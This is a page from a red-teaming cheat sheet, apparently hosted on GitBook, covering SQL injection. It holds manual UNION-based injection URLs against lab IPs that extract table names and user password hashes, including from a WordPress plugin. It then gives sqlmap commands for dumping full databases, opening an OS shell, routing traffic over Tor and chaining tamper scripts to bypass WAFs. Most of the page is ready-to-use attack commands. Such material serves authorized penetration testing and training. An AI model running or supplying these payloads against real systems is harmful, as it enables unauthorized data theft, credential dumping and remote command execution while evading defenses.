Red Teaming and Malware Analysis
@sirpedrotavaresseguranca-informatica.pt0xSI_f33d
Search…
About
Red Teaming
Cheat Sheet
Web
Misc
File Upload bypass
Authentication bypass
SQL Injection
XSS
XXE
Reverse-shell
Webshell
(De)Serialization
Active Directory
Services by port
Hardening
Stuff
Active Directory 101
Fuzzing and Web
Initial Foothold
Privilege Escalation (Privesc)
Lateral Movement (Pivoting)
Persistence
Command and Control (C&C)
Data Exfiltration
CVE & Exploits / CTF
Tools
Resources
Malware Analysis
Unpacking
Basic tips
Malware instrumentation with frida
Tools
Resources
Mobile
Tools
Reverse iOS ipa
Reverse Android APKs
Basic tips
Resources
IoT / Reverse / Firmware
Basic tips
Reverse IoT devices
Tools
Resources
Powered By GitBook
SQL Injection

Manual tests

1
http://10.11.15.137/comment.php?id=756'
2
http://10.11.15.137/comment.php?id=756 order by 7
3
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,6,7
4
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,table_name,7 from information_schema.tables
5
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,column_name,7 from information_schema.columns where table_name='users'
6
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,concat(name,0x3a,password),7 FROM users
7
8
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
9
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users
Copied!

SQLmap 101

Simple Usage

If you don’t know anything about the target site then use the normal command first, Observe if the sqlmap found something juicy for you
1
sqlmap -u “https://target_site.com/page/”
Copied!

Automatic GET request parameter

1
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”
Copied!

Specify the GET request parameters to Exploit

You can specify on which parameter you want to check or exploit the sql injection using just “-p” flag.
1
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” -p p1
Copied!

Use POST requests (Test All parameters)

1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"
Copied!

SQLMap Request file as input

You can specify a request file containing the HTTP request, You can get it quickly from BurpSuite.
1
sqlmap -r request.txt
Copied!
Here you can specify the targeted parameter or sqlmap will recognize and will test for all the parameters found.
Specify Custom Position in HTTP request file
You can use asterisk sign(*) to specify which parameter to attack or which place of the request to be attacked. You can specify or mark any part of the request by this method.
1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"
Copied!

Use Authenticated Session with Auth Headers

1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"
Copied!

Basic Authentication

1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password
Copied!

Use Previously created Session as SQLmap input (-s)

If you got SQL injection positive somewhere, then sqlmap will automatically create a session file(.sqlite) for later use. Now, If you want to try some other commands later, you can use the session file directly (It will save your time to re-try all the possible payloads and identify the vulnerability and all.)
1
sqlmap -u “https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs
Copied!
You can use this file from the home path of sqlmap tool’s output directory.

Post Exploitation Commands

If the SQL injection vulnerability observed positive then you can use the following commands to Exploit the SQL injection vulnerability.

List the Databases

1
sqlmap -u “https://target_site.com/page?p1=value1” --dbs
Copied!

List Tables of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables
Copied!

List Columns of Table TARGET_TABLE of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns
Copied!

Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump
Copied!

Fully Dump Table TARGET_TABLE of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump
Copied!

Dump full Database

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump
Copied!

Custom SQL query

1
sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"
Copied!

Get OS Shell

1
sqlmap -u “https://target_site.com/page?p1=value1” --os-shell
Copied!

Get SQL shell

1
sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell
Copied!

SQLMap Proxy

Proxy through Burpsuite

1
sqlmap -u “https://target_site.com/page?p1=value1” --proxy="http://127.0.0.1:8080/"
Copied!

Use Tor Socks5 proxy

1
sqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs
Copied!

Extra

Specify The Database Type

1
sqlmap -u “https://target_site.com/page?p1=value1” --dbms=mysql
Copied!
You can use other DBMS types like MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.

Attack Techniques

–technique Specify a letter or letters of BEUSTQ to control the exploit attempts:
  • B: Boolean-based blind
  • E: Error-based
  • U: Union query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries
1
sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ
Copied!

Specify the Injection Techniques

You can specify the difficulty levels using two flags,
  1. 1.
    –level = LEVEL Level of tests to perform (1-5, default 1)
  2. 2.
    –risk=RISK Risk of tests to perform (0-3, default 1)
1
sqlmap -u “https://target_site.com/page?p1=value1” --risk=3 --level=5
Copied!
Option: --risk
This option requires an argument that specifies the risk of tests to perform. There are three risk values.
–riks=1: 1 is default value which is for the majority of SQL injection points.
–riks=2: Adds to the default level the tests for heavy query time-based SQL injections
–riks=3: Value 3 adds also OR-based SQL injection tests.
Option: --level
When the value of --level is >= 2 it tests also HTTP Cookie header values. When this value is >= 3 it tests also HTTP User-Agent and HTTP Referer header value for SQL injections.

Use Default Options for the process

Use –batch flag to use all the default options or used for non-interactive sessions. (By specifying –batch flag, sqlmap will not ask you for the (Y/N) choice rather then it will smartly choose according to the needs.)
1
sqlmap -u “https://target_site.com/page?p1=value1” --batch
Copied!

–force-ssl flag

Force SQLmap to use SSL or TLS for its requests.
Error: Can’t establish SSL connection
If you getting the following error during testing then you can use the flag –force-ssl to force SQLMap to use SSL or TLS.

Tamper Scripts

You can use the tamper scripts to bypass WAF or to modify the payload. You can use multiple tampering scripts at once using –tamper flag.
1
sqlmap -u “https://target_site.com/page?p1=value1” --tamper=charencode
Copied!

For General Perpose Usecase:

1
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
Copied!

MSSQL:

1
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dsash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
Copied!

MySQL:

1
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Copied!
OR You can create your own Custom Tamper script to overcome the issue of some type of Encrypted payloads like AES, DES, Hashing, etc.
GitHub - kleiton0x00/Advanced-SQL-Injection-Cheatsheet: A cheat sheet that contains advanced queries for SQL Injection of all types.
GitHub
SQLMap Cheat Sheet : The Lazy Man's Guide | The Dark Source
The Dark Source
Full SQL Injection Tutorial (MySQL)
Exploit Database
NetSPI SQL Injection Wiki
netspi
Previous
Authentication bypass
Next
XSS
Last modified 4mo ago
Copy link
Contents
Manual tests
SQLmap 101
Simple Usage
Automatic GET request parameter
Specify the GET request parameters to Exploit
Use POST requests (Test All parameters)
SQLMap Request file as input
Use Authenticated Session With Cookie
Use Authenticated Session with Auth Headers
Basic Authentication
Use Previously created Session as SQLmap input (-s)
Post Exploitation Commands
List the Databases
List Tables of Database TARGET_DB
List Columns of Table TARGET_TABLE of Database TARGET_DB
Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB
Fully Dump Table TARGET_TABLE of Database TARGET_DB
Dump full Database
Custom SQL query
Get OS Shell
Get SQL shell
SQLMap Proxy
Proxy through Burpsuite
Use Tor Socks5 proxy
Extra
Specify The Database Type
Attack Techniques
Specify the Injection Techniques
Use Default Options for the process
–force-ssl flag
Tamper Scripts